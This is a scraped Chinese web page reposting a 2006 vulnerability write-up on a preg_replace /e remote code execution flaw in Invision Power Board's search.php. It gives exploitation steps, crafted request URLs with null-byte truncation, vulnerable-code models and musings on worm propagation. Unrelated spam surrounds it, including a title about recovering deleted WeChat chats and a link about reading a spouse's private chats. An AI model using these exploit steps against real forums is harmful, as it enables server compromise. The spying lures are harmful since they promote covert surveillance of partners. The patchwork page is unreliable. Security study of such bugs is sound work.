微信聊天记录被清空了怎么查?一键查询微信聊天
ipb search.php 漏洞分析及思考Author:SuperHei_[At]_ph4nt0m.orgBlog:http://superhei.blogbus.com/Team:http://www.ph4nt0m.orgData: 2006-04-27###############简单分析################该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php行1258-1262:if ( $this->ipsclass->input['lastdate'] ){$this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );}}通过变量input['lastdate']注入/e, $this->output注入shellcode。###############利用 *** ################注册一个用户,发个贴 内容[shellcode]如下:[superheixxxxxxxeval(phpinf0()); //注意最后的;和//之间有一空格然后点“Search”--->Search by Keywords:superheixxxxxxxeval [记得选择Show results as posts ]可以得到searchidhttp://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&result_type=posts&highlite=superheixxxxxxxeval然后在后面加一个&lastdate=z|eval.*?%20//)%23e%00 也就是[/e]提交就ok了:http://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&result_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00###############分析讨论################1. 简单分析:该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php行1258-1262:if ( $this->ipsclass->input['lastdate'] ){$this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );}}通过变量input['lastdate']注入/e, $this->output注入shellcode。这个分析,掉了一个重要的细节:preg_replace+/e 里有3个参数,只有第2个参数里的代码才可以执行,但是上面的语句貌似是第3个参数提交的,其实不然,注意上面preg_replace里的第2个参数:\\1 selected='selected' 里面的\\1 为之一参数里正则表达试匹配后的值。归根结底我们提交的shellcode还是在第2个参数执行了。2. 注意最后的;和//之间有一空格这个又是为什么呢?因为我们提交的lastdate=z|eval.*?%20//)%23e%00里是已空格+//为标志的,所以我们提交的shellcode也要有空格+//3.preg_replace存在null截断漏洞????我想这个应该算是php本身一个的漏洞[同以前include的null截断漏洞],我们测试下,把上面的漏洞写个简单的模型:<?$a=$_GET[a];echo preg_replace("#(value=[\"']z|eval.*?//)#e{$a}[\"'])#i ","\\1 ","heigegegxxxxxxxeval(phpinfo());//");?>我们直接提交http://127.0.0.1/test2.php?a=2出现错误:Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3提交http://127.0.0.1/test2.php?a=%002 则执行phpinfo(). 我们成功截断了。模型代码执行环境要求gpc=off ,但是在很多的web程序里是经过变量编码和解码在执行的,所以不受gpc的影响,上面的ipb的就可以在gpc=on的情况下截断。4."lastdate=z|eval.*?%20//)%23e%00"的构造主要是在this->output里以eval和%20//为标志取\\1 为执行的php代码。5.worm的利用?还记得Santy吗?就是利用的phpbb里的一个preg_replace,这里会会被利用呢?ipb这个漏洞的利用必须要登陆,但是在ipb注册时候有“图片认证”,不过据说这个可以编写程序读出来?? 只要突破这个worm是有可能的,毕竟ipb的用户有那么多......###############总结模型################1.直接在preg_replace第2个变量执行的模式:<?echo preg_replace("/test/e",$h,"jutst test");?>提交http://127.0.0.1/test/11/preg.php?h=phpinfo()实例如:phpbb的viewtopic.php变量$highliht_match提交php代码执行漏洞2.通过\\1[或者\\n]提取第3个变量里的php代码并执行的模式:<?echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $h);?>提交:http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php]参考:r57的exp:http://www.milw0rm.com/exploits/1720更多资料:http://www.google.com
相关文章
笔记本自动关机是什么原因,笔记本自动关机
笔记本电脑因为其体积小巧,便于携带等特点受到了很多企业高管和IT从业者的欢迎,有些朋友在使用笔记本电脑的时候会遇到笔记本自动关机的情况,下面小编就来跟你说说解决方法。 随着人们生活水平的不断提高,许...
黑客代码书籍名字的简单介绍
介绍黑客和网络安全方面的书有哪些名著? Jargon File中对“黑客”一词给出了很多个定义,大部分定义都涉及高超的编程技术,强烈的解决问题和克服限制的欲望。如果你想知道如何成为一名黑客,那么好,只...
哪里有查询我老婆和其他女人聊天记录
风筝线经常发生伤人的事故,因此选择好的风筝对于孩子的安全是一种保障,特别是一些网红风筝安全隐患较大,容易引发事故,那么哪些风筝不适合孩子玩?什么风筝好?下面友谊长存小编带来介绍。 哪些风筝不适合孩子...
加多宝与中粮和解是什么情况?加多宝和中粮包装事件始末仲裁结果出
历时一年多,加多宝和中粮包装之间的仲裁结果终于落定。在巨额赔偿和注入商标的裁决下,两者合作的不确定性迅速得到清除! 事情要从昨天傍晚说起。中粮包装控股有限公司发布公告称,于2019年11月14日中粮...
黑客帝国3解说越哥说电影(黑客帝国三部曲解说)
本文目录一览: 1、黑客帝国1,2,3的剧情详细介绍! 2、黑客帝国三主要剧情是什么 3、《黑客帝国3》结局解析是什么? 黑客帝国1,2,3的剧情详细介绍! 上一部结尾,尼奥(基奴李维...
蒋师傅砂锅麻辣烫加盟店赚不赚钱?广阔前景不容错失
跟着经济程度的成长,那么此刻公共都纷纷把眼光聚积在创业上,因为有着为数不少的创业者提供创业做加盟品牌加盟项目得到了乐成。还在踌躇的创业者见势虽然也是纷纷的眼红心热,但愿可以加盟好品牌好项目得到纷歧样的...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!